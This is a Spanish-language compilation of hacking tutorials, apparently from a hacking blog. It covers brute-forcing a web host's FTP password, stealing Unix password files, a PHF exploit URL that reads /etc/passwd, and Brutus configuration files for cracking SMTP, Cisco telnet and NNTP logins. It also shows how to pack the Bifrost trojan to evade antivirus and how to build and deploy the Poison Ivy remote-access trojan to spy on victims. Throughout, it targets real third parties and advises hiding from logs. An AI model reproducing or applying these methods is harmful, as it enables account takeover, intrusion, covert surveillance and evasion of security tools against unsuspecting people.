Parse error: parse error, unexpected T_FOR, expecting ‘,’ or ‘;’ in /home/virtual/sitio19239/www/index.php on line 8
Perfecto ahora ya tenemos la ruta y por lo tanto el nombre de usuario es admin19239 (solo hay que cambiar la palabra sitio por admin)
Ahora solo nos falta la contraseña y estaremos dentro Sonrisa,ahora es cuando agradecemos a gratishost que solamente permita contraseñas maximo de 7 caracteres

2.-Ponemos a funcionar el FTP Cracker (o cualquiera que tengas a la mano,el brutus si quieres jajaj) configuramos de la siguiente forma

Nota. Si quieres podes usar el FTP Cracker.
Y gracias a que solo tenemos que buscar el rango de 4 a 7 caracteres el password sale bastante rapido a mi me llevo alrededor de 4 horas,con un password de 6 caracteres,si tienes paciencia con 1 dia maximo sacas la contraseña
El siguiente paso simplemente fue verificar que la contraseña del ftp era la misma que la redireccion de .tk (vaya imbeciles) y con esto lograomos el objetivo.

 


manual hackear php-nuke


Tutorial para hackear phpnuke donde explica detalladamente:

Como usar el bug
Explotar el bug
conseguir la contraseña del admin (hash)
Crackear la contraseña
Acceder al panel de control.


 


Como hackear una web


Bueno aki les dejo un manual de muxa utilidad. extraido de Foro pOrtal Hacker 

   COMO HACKEAR PÁGINAS WEB por Philber

Bien.. seguro que este es uno de los puntos que más interesa a los hackers novatillos…
Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo.
No voy a explicar todas las técnicas que se pueden usar para conseguirlo.
Las técnicas son infinitas. Por cada agujero posible en un sistema, hay una técnica. Solo
es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamos
a “visitar”. Debemos buscar todos los posibles accesos al sistema… (telnet, ftp, etc…)

COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTP

Ok, bien… Una de las formas más facil de conseguir ser “superusuario” en el sistema es
accediendo a traves de ftp anónimoal fichero “passwd”. Primero necesitas conocer algo sobre
los ficheros password:

root:User:g36Dfr:1j2YF6:1256:20:Superuser
Camilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/csh
BlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/csh

Este es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da
el root. Es la parte que nos interesa.

root:*:0:1:Misericordios:/:/bin/sh
ftp:*:202:102:Anonymous FTP:/U1/ftp
ftpadmin:*:203:102:ftp Administrator:/u1/ftp

Este es otro ejemplo de un fichero password, solo que este tiene una pequeña diferencia
este está controlado. Los password controlados no te dejan ver o copiar el actual password
encriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica).
Losiguiente es otro ejemplo de otro password controlado:

root:*:0:1:0000-Admin(0000):7:/usr/bin/csh
daemon:*:1:1:0000-Admin(0000):/:
bin:*:2:2:0000-Admin(0000):/usr/bin:

etc…
los password controlados tienen un “*” o “x” en el lugar donde va el password.
Ahora que tu conoces un poco más acerca de como identificar un password encriptado de un
password controlado, podemos hablar de como crackearlo.

Cracker un password no es tan complicado como parece. Los archivos varían de sistema a sistema.
Debemos antes que nada, de hacernos con el fichero passwd.
Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un
diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper,
brute force cracker…. Los puedes encontrar en cualquier página de hacking, incluido la mía.
http://www.redestb.es/personal/lcd
Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para
buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas
las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de
caracteres “raros”. Lo normal es que tenga predefinido miles de palabras posibles.
Si este método no funciona se hace un rastreo completo, probando todas las combinaciones
posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el
problema está en que tarda mucho. Una vez tengas el password, YA ESTA!!!
tendrás acceso a todo el sistema.

TECNICA PHF

la tecnica del phf es una de la más vieja (y que menos suele funcionar,tambien hay que decirlo)
de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede…)
ya que no cuesta nada y aveces se encuentra a alguna víctima que cae.
Todo lo que debes hacer es abrir tu “notescapes navegando” y escribir lo siguiente:

http://www.web_a_hackear.es/cgi-bin/phf?Qa…t%20/etc/passwd

reemplaza www.web_a_hackear.es por el dominio.
y ya está!. acontinuación se empezará a transmitir una linda copia del fichero con
los password (si funciona, claro está.

REDES LOCALES

Otro sistema es buscar la direccion IP del dominio a hackear. Todas las máquinas conectadas
a la red tienen una dirección IP. por ejemplo:
www.probando.com
debemos averiguar el IP de este servidor. (no me jodas con que no sabes como).
hay miles, no, millones de programitas que te lo dicen.
(hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice)
suponiendo que fuese:
194.179.23.100
esto es la dirección IP de la máquina central. Tal vez inaccesible, pero si tiene una red local
conectada a esta.. (ordenador del diseñador, del director… que se yo!)
las máquinas de la red tendrán un IP muy parecido. Sabes lo que puede pasar si en tu
navegador escribes lo siguiente?:
194.179.23.101 o 194.179.23.102 … etc…
que accederás a los ordenadores que estén en esa red local (siempre y cuando sean tan capullos
de no protegerlos porque no están cara al público!)
curioso ¿no?

DIRECTORIOS OCULTOS

Este método aunque parezca una chorrada… te juro que no lo es.
Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker….

…a ver… voy a hackear un servidor de Internet…
este esta bien. Son novatos. Mucho mejor, seguro que tendrán
un huevo de fallos. ¿Tendrán ftp anonimo?
Login: anonymous
passworD: anonymous
yeah! hay ftp anónimo con programitas shareware jeje….
mmmm… no está el directorio etc/ ….
vamos a ver si deja cambiar de directorio. igual está oculto.
-chg directory
cambiar a /etc
no existe. igual lo tienen protegido.
cambiar a /administrador
no existe.
cambiar a /administrator
SI EXISTE… hehehe
que hay en este directorio… etc/ bin/ mail/ (joder!) etc…..
joder! si están las páginas web aqui!
y el correo electrónico y todo!
ah!. Soy un hacker no un criminal.

A pesar de poder abrirse cuenta de acceso a internet, leer correos electrónicos
etc… solo cambió la página web.

el servidor en cuestión es conexión global internet (http://www.cglobal.com)
aunque el nombre cambió durante un día por “conexión mamadón internet”
hehehe… ya no tienen ftp anonimo. (mira a ver). es que los hay capullos.
Por probar que no quede. A probar todo lo que se te ocurra.
Si el servidor es de WinNT mejor que mejor! más rápido caerá.
probar con directorios ocultos tipo:
/root
/pub
/bin
/etc
/administrador
/administrator
/lo que se te ocurra.

Hay otros métodos, los más eficaces (y más complicados) por Telnet, etc.

 




Manual Brutus


Hola a todos voy a hablaros de un programa con el que deberiais familiariza-ros, ya q resulta de mucha utilidad en muchas ocasiones.

Podemos definir el Brutus como un crackeador de passwords remoto on-line, es rapido admite hasta 60 conexiones simultaneas ( cuidado con esto que puedes tirar abajo algun servicio ), puede llegar 2500 palabras por segundo << con dialup ni de coña, no es bueno excederse en esto casi regula las conexiones segun tu linea y la calidad de respuesta que te de el servidor.

Haber empecemos con lo q interesa, lo primero que haremos sera descargar el brutus Aqui bien estas son sus caracterisitic as:

Podemos utilizar el brutus para sacar passwords:

HTTP (Autentificacio n basica)
HTTP (HTLM Form/CGI)
POP3
FTP
SMB (netBIOS)
TELNET
NETBUS

Y a parte podemos configurarlo para petar un servicio que configuremos noso-tros mismos como smtp, nntpd etc entre sus caracteristica s cabe destacar la posibilidad de usar un proxy sock(v4) sock(v4.1) y sock(5), puedes encontrar proxies en http://www.atomintersoft.com/products/alive-proxy/proxy-list/ a veces muchos servicios

Tambien dispone de un generador de diccionarios bastante completo, en Tools >> Wordlist Generator, veamos las opciones que tiene:

Convert list (LF>CRLF) – convierte una lista de palabras en formato unix a formato dos cambiando los saltos de linea,para usarlo selecionaremos la lis-ta en estilo unix en “input list” y en “output list” el nombre de la lista de salida que queremos.

Only word length – con esta opcion lo q hacemos es coger de una lista de pa-labras las quekeramos en funcion de su longitud definiremos el numero de ca-acteres en word lenght y selecionaremos la lista que keremos en input list y la de salida en output.

Remove duplicates – esta opcion lo q hace es copiar la lista de entrada a la q keramos eliminando las palabras duplicadas.

Permutations – esta opcion realiza cualquier tipo de permutaciones sobre una determinada lista de palabras añadiendo mayusculas minusculas invirtiendo la palabra… solo es usar la permutacion q mas nos interese.

Create new list – con esta opcion ya no necesitamos una lista de entrada simplemente crearemos una con los parametros que queramos donde definiremos el numero de caracteres y las permutaciones como en el apartado anterior ademas tenemos la opcion de seed word q lo q hace es q nosotros añadimos unas palabras y vea la lista utilizando esos caracteres.

Create new list for user – aki crearemos una nueva lista en la ke ademas podremos poner un nombre de usuario del cual partira el programa

Create new list for users – esta es igual que la anterior pero podemos selecionar una lista q tengamos con usuarios en input list para q cree la lista en base a esos users.

Podemos utilizar varios metodos de autentificacio n tanto para el modo de password como para el modo de usuario:

En Authentication Options: El modo de identificacion del usuario siempre es el mismo para todos los metodos de ataque que explicaremos detenidamente, hay dos modos como podras observar “Use Username” el cual usa un diccionario y va probando uno a uno, o “Single User” que sirve para usar un solo login, el de la victima y con ese login probara todos los pass mediante los metodos que vamos a ver ahora.

NOTA: He visto el diccionario de users.txt es pequeñito aqui os lo planto Admin

administrator
test
guest
root
backup

Bueno respecto a servicios ftp estos nombres de usuarios y alguno mas se les deniega el acceso como login , bueno esto esta en /etc/ftpusers en un proftp, pero asi suele venir en muchos servicios ftp segun los instalas
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody

Este archivo puede modificarse,simplemente con añadir + usuarios a quien deniegen el acceso y todo depende de quien lo administre, bueno ahora veamos lo distintos modos de ataque.

Para usar distintos metodos de ataque solo tienes que seleccionar en “Pass Mode” y coger el ataque que mas te convenga Word list “Ataque por diccionario”:No pienses que estamos hablando de el larouse, si no de una simple lista de palabras, que nos pueden ahorrar trabajo a diferencia de otros metodos como el brute force ,. para seleccionar el diccionario solo tienes que ir a Browse y escogerlo Combo list: Para este tipo de ataque tambien se necesita un diccionario, si la diferencia con el de arriba es que combinan las palabras del diccionario separadas por “:” “_”,

ej guest:password ver example-combo.txt

Brute force “Ataque por fuerza bruta”,este ataque trata de sacar el pass mediante combinaciones de “letras, numeros, caracteres especiales” esto puedes personalizarlo he incluso limitar el numero de caracteres, cuando seleccionas este metodo aparece el boton “Range” cuando calcas este se abre un menu “Brute Force Generation”, en el cual hay varias opciones:

Digits Only: Solo numeros
Lowercase Alpha: Solo minusculas
Uppercase Alpha: Solo mayusculas
Mixed Alpha: combinacion de mayusculas y minusculas
Alphanumeric: abcd….z
Full Keyspace: Prueba con espacios por ej: Pepe 12
Custom Range: Ahi puedes meter los caracteres que quieras
Min Length: Seleccionas el numer o de caracteres minimo que podra tener elpass
Max Length : Aqui seleccionas el numero de caracteres maximo que comprobara

2. Elección de servicio a atacar
Las 2 primeras opciones HTTP se utilizan para entrar en esas paginas que al intentar acceder nos sale una ventana pidiendo login y pass utilizaremos uno u otro dependiendo del tipo de autentificacio n que rekiera dicha web lo comprobaremos probando con ambos tipos., las HTTP “CGI application authentication” son las que usan programas CGIs, para autentificarse, ( podeis mirar el articulo de Problemas con los CGIs de NORTH que comenta un poco que son los cgis etc). Para utilizarlos no hay mas que poner en target por ej: www.victima.co m o victima.com y seleccionar en autentificatio ns options use username y pass mode el metodo ke mas nos convenga como norma general usaremos en este tipo de webs un dicionario del idioma en el ke este dicha web.

Esto es util sobre todo para esas webs xxx en las q rekieren ser socio para entrar claro esta q no sacaremos nada util de ellas unke estareis un rato entretenidos xDD.

POP3 bueno esto ya es algo mas interesante usaremos esta opcion para petar cuentas de correo de servidores q tenga pop3 activo. Selecionamos POP3 y en target escribimos POP3.victima.c om por ejemplo:

(pop3.terra.es) o en su caso la ip, en autentificatio n options marcamos use username y single user, y escribiremos en la casilla de userid victima.terra. es si la cuenta de la victima es (victima@terra.es). Lo escribiremos con punto(.) no arroba(@) y de nuevo usaremos el modo de pass q mas nos interese ya sea dicc, combo o brute force.

Bueno pasemos al ftp aunque como vereis la rutina es parecida en todos los tipos rekieren pequeñas variaciones en cada uno de ellos. En este caso nos convendra tener un nombre de usuario del que trataremos de sacar el pass aun q tambien podemos buscar nombres de usuario al azar, lo cual logicamente nos llevara mucho tiempo. Selecionamos type ftp y si tenemos un nombre de usuario marcaremos use username y single user escribiremos el nombre de usuario por ej: pardillo y selecionaremos el metodo dicc,combo… si no tenemos nombre de usuario selecionamos un diccionario y marcamos solo la casilla useusername.

TELNET – pues es facil lo haremos igual que con un ftp pero selecionando type telnet claro esta .

SMB (netBIOS) bueno aki tenemos otro servicio del cual tb podemos sacar provecho usando el brutus si es q esta protegido, cuanta gente piensa que este servicio lo dan solo maquinas con win lo habre oido mil veces, “na tio es un win tiene el 139 abierto” ,cuando hablamos de SMB”Server Message Block “SMB es un protocolo idea de IBM mientras desarrollaban un sistema basico de E/S para LANS, que luego se llamo NetBIOS, sobre el que luego IBM implemento una interfad mejorada de usuario, llamada NetBEUI. NetBIOS se puede transportar sobre diferentes protocolos de red: NetBEUI,IPX/SPX y TCP/IP, etc. tb se pueden ofrecer este servicio en otros sistemas unices, OS/2, BeOS etc, la unica cosa q tendremos q tener en cuenta a la hora de realizar nuestro atake, en target escribimos la ip de la victima selecionamos type SMB(netBIOS) y ahora en SMB options si se trata de una makina NT escribiremos el nombre del dominio si es solo un pc con win2 9x no marcaremos esta opcion, a continuacion en autentificacio n options ya sabeis selecionaremos use username y el modo de pass q mas nos convenga.

NETBUS – he aki otra utilidad por si olvidamos el pass de alguna victima de netbus o simplemente queremos entrar en alguna que hemos encontrao y esta protegida con pass. Si conoceis este troyano sabreis que cuando lo proteges con pass para entrar solo se rekiere el pass no el login, por eso al seleccionar type netbus no podemos selecionar en autentificatio ns options la opcion de use username o single user si no q solo podemos selecionar la opcion de pass (dicc, combo list …) pues eso haremos lo cual no tiene mayor complicacion.

Ya hemos visto los types q trae el brutus de serie pero no nos vamos a kedar ahi, tb podemos crear nuevos types es decir preparar el brutus para q se conecte a un determinado servicio usando unas determinadanas instruciones q pondremos en el archivo q hagamos.

Ahora os voy a poner un ejemplo de como preparar nuevos types vamos a ver uno para (smtp_verificac ion_de_usuario ), en la web oficial podeis encontrar alguno, te preguntaras como se hacen pues simplemente viendo como verifica el servicio el nombre del usuario y la pass, o en algunos casos solo las pass, para ello puedes ayudarte un sniffer, netcat o cualquier cliente de telnet ya hablaremos de estas utilidades o utilidades parecidas en siguientes ezines.

Seria asi:

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=25
UseUserID=0
userprompt=login
passprompt=passwd
RespString=
HTTPRequestTyp e=POST
useHTTPKeepAli ve=1
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=0
maPrimaryRespo nseAction=13
maSecondaryRes ponseAction=13
maUserPrefix=”"
maUserPostfix=”"
maPassPrefix=”VRFY ”
maPassPostfix=”"
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=”"
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=”220″
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=”HELO .”
maauthReadLeng th3=1
maauthSendPost fix3=CR+LF
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=”"
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=”"
maauthReadLeng th5=1
maauthSendPost fix5=None
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=”"
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=”"
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=”"
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=”"
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=”"
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=”"
maauthReadLeng th11=1
maauthSendPost fix11=None
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”250″
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=”"
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”550″
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”252″
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=”"
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

ara utilizar este codigo crearemos un archivo bad pegaremos en el el codigo y lo guardamos con el nombre q keramos por ej: smtp_b_auth.ba d una vez guar dado solo hay que ir a File > Import Service y seleccionar el type, estos types los puedes configurar en Modify Sequence tb, ahi puedes cambiarlo a tu gusto el metodo o la forma de autentificacio n, tiempo de espera etc , lo guardas con la configuracion que tu quieras en File > Export Service.

Este type lo ke hace es utilizar el comado VRFY “verify” (utilizado para verificar el nombre del usuario) que aunke suele estar desactivado en muchos server debido a que puede revelar informacion tambien otro comando que puede revelar informacion es EXPN (expand) sirve para indicar como se va a resolver la dirección de correo del RCPT que le indiquemos, aunque sea antiguo todavia hay algunos en los que no lo esta desactivado y lo que nos permitira es comprobar utilizando una lista o dicc de users comprobar cuales estan utlizados o no.

Veamos otro para atakar el password en un router CISCO

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=23
UseUserID=0
userprompt=
passprompt=
RespString=
HTTPRequestTyp e=GET
useHTTPKeepAli ve=1
posResponse=0
IsTelnet=1
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=0
maPrimaryRespo nseAction=13
maSecondaryRes ponseAction=5
maUserPrefix=”"
maUserPostfix=”"
maPassPrefix=”"
maPassPostfix=”"
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=”"
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=”Password:”
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=”cisco”
maauthReadLeng th3=1
maauthSendPost fix3=CR+LF
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=”>”
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=”enable”
maauthReadLeng th5=1
maauthSendPost fix5=CR+LF
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=”"
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=”"
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=”"
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=”"
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=”"
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=”"
maauthReadLeng th11=1
maauthSendPost fix11=None
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”Password:”
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=”"
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”Password:”
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”% Bad passwords”
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=”"
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

Veamos otro mas para atakar el metodo de autentificacio n que usan los servidores que proporcionan servicios nntpd “Network News Transfer Protocol”, como podras observar en el codigo usa el puerto 119

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=119
UseUserID=1
userprompt=
passprompt=
RespString=
HTTPRequestTyp e=POST
useHTTPKeepAli ve=0
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=1
maPrimaryRespo nseAction=0
maSecondaryRes ponseAction=0
maUserPrefix=”AUTHINFO USER ”
maUserPostfix=”"
maPassPrefix=”AUTHINFO PASS ”
maPassPostfix=”"
maUsePreAuth=0
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=”"
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=”"
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=”"
maauthReadLeng th3=1
maauthSendPost fix3=None
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=”"
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=”"
maauthReadLeng th5=1
maauthSendPost fix5=None
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=”"
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=”"
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=”"
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=”"
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=”200″
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=”"
maauthReadLeng th11=1
maauthSendPost fix11=CR+LF
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”381″
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=”"
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”502″
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”281″
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=”"
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

3. Para acabar
Quiero recomendaros que siempre q engacheis el brutus a alguna victima no lo hagais directamente recomiendo q useis un proxy, o cualkier otro metodo para mantener el anonimato pq todos los intentos q hagais kedaran logeados.

Bueno creo q no me dejo nada espero que os resulte util esta explicaion y si no pos a joderse xDD.

Podeis reanudar vuestro “ataque”: el brutus guarda el utlimo ataque en autosave.bru, puedes reanudarlo solo con ir a File > Load Session, asi como guardar tus ataques en Save Session con el nombrequequier as.bru.







Cómo hacer el troyano Bifrost indetectable a los antivirus


Bueno creo q ya era hora de sacar un artículo relacionado con el hacking, en esta ocasión aprenderemos como hacer el server del troyano Bifrost indetectable para la mayoría de los antibichos incluyendo Norton, Panda, etc.Bien, realmente el procedimiento es bastante sencillo ya que todo el trabajo lo realizan 2 excelente programas! el AsPack
y el NsPack pues bien se los bajan y los instalan.

0k ahora lo que vamos a hacer es abrir nuestro Bifrost 1.1.02 y le damos click en ‘Builder’ para comenzar a construir el server…

Bien despues de haberle dado click en ‘Builder‘ nos aparecerá una pantalla como la de arriba, ahora vamos a introducir
nuestros datos.

Connection:
DNS / IP 1: Aquí vamos a poner nuestra IP para q la ‘víctima‘ se conecte a nuestra máquina, pero lo más probable esq contemos con una IP dinámica, entonces deberemos crearnos una cuenta DNS estático (esto hará q nuestro IP se convierta en un DNS y asi es como si tuvieramos IP fija) para eso nos vamos a www.no-ip.com y bueno le damos en ‘Sing-Up Now!‘, después de haber creado su cuenta se van a ‘Hosts/Redirects’ y bueno de ahi a ‘Add’ y agregan pues se crean su DNS. En ‘Port’ ‘Password’ dejamos los valores que están, bueno pueden cambiarlos da igual

Startup:
Ahi en ‘Registry Key‘ le ponemos el nombre q deseamos q aparezca en el registro, les recomiendo q pongan algo de lo q el usuario no sospeche como Loadqm, Windows Backup u otra cosa q se les ocurra traten de echarle coco . Las otras tres opciones restantes las dejamos palomeadas.

Installation:
Filename when installed: Este es el nombre con el q aparecerá el servidor cuando se instale en la máquina remota, les reitero q le pongan un nombre del q nadie pueda sospechar ok??
Assigned Name: Aqui le ponen lo q quieran es el nombre q les aparecerá cuando una persona se conecte a su PC.
Pueden elegir el directorio en el cual se almacenará el server, ‘Windows Directory’ o ‘System Directory’ se los dejo a su elección. La opción de “Melt Server” es para desaparecer el server y la de “Delayed startup’ para retrasar la ejecución
del server, ambas también se las dejo a su libre albedrío, jaja ke mamón

Plugin:
Aqui dejamos todas las opciones como están realmente no hay razón para cambiarlas.
Y finalmente dejamos sin palomear las 2 opciones restantes:
‘Autopack Server’ y la de ‘Injection’.

Comenzamos!!
Después de haber hecho todo lo anterior le damos en ‘Build’se creará el archivo server.exe en la carpeta en la q tengamos el bifrost y nos aparecerá una ventana como esta:

Ahora después de q aparezca esta pantalla la dejamos asi o sea no le damos en ‘Aceptar’, con esto nosotros seremos
quienes comprimamos el server.
Abrimos el AsPack ahi en el programa le damos click en ‘Open‘ y buscamos el archivo sever.exe q está en la carpeta del Bifrost, seleccionamos el archivo server.exe, le damos aceptar y automáticamente lo comprimirá. Nos debe aparecer una pantalla como la q se muestra a continuación, también se creará un archivo llamado ‘server.exe.bak‘, ese lo borramos.

Bien cerramos el AsPack y borramos el ’server.exe.bak’. 
Ahora abrimos el NsPack, le damos click en ‘Open’ y buscamos el archivo server.exe en la carpeta de Bifrost, lo abrimos, después le damos ‘Compress’ y listo! esta comprimido!, nos aparecerá una pantalla como esta:

Bien ahora cerramos el NsPack, y nos vamos al Bifrost de nuevo, ahora si le damos ‘Aceptar’, nos aparecerá una pantalla
confirmándonos que el servidor se ha creado correctamente!.

Ahora ya tenemos un servidor totalmente indetectable para la mayoría de los antivirus!! Úsalo con moderación y no hagas tonterías con él OK?
Existe otro método también bastante efectivo para hacer indetectable este troyano, usando OllyDBG pero lo dejaremos para otra ocasión.

Espero que este texto les haya gustado.

 


Tutorial poison ivy 2.3.0


Introducción

El Poison Ivy es uno de los mejores Troyanos junto al Bifrost, aunque el Poison es más moderno.

El único bug que tiene, esque cuando activas la opción de Keylogger, no te muestra los acentos, pero por lo demas .. funciona perfectamente  =P

 

Descarga

El Troyano puedes descargarlo desde este link:
Descargar posion ivy 2.3.0

Cuando lo descargues, lo extraes a una carpeta normal y empezaremos a crear el Server ..

 

 

Creando el cliente

Abrimos el Poison, la primera ventana será esta ..

Ahora vamos a crear el Cliente, que es como el Admin del Server.
Este indica que puerto utilizará el Poison y su contraseña.

Creación del Server

Pinchamos en la pestaña File, y en New Server

A continuacion, clickea en el icono Next para seguir creando nuestro Server  =)

La pestaña Advanced, dejala tal como esta, y el proceso msnmsgr.exe puedes activarlo para que solo recoja las conversaciones

En la pestaña Build, no toques nada y clicka solo en Generate. Ahi elige donde quieres guardar el Server.exe y su nombre.

¡ Ya hemos creado el Server !

 

Opciones de la víctima

Cuando hayamos enviado a la victima el Server, y lo ejecute, nos aparecerá una notificiacion (antes debemos hacerlo indetectable).

Primero vemos a nuestra victima y pensaremos que hacer con ella  ^^

Esta son las opciones que nos da para fisgonear, mas adelante infectare a alguien y os pondre la captura de WebCam o Screenhots ..

PD: Espero que os haya gustado, saludos  x)

 


MANUAL DE POISON IVY 2.3.0


Introduccion:

El poison, se trata de un troyano de conexion inversa. Esta compuesto de
dos partes; un cliente.exe que es mediante el cual creamos el server, y
una vez creado, tendremos un server.exe que es el que tendremos que enviar
a nuestras victimas para que lo ejecuten, y poder controlar remotamente su
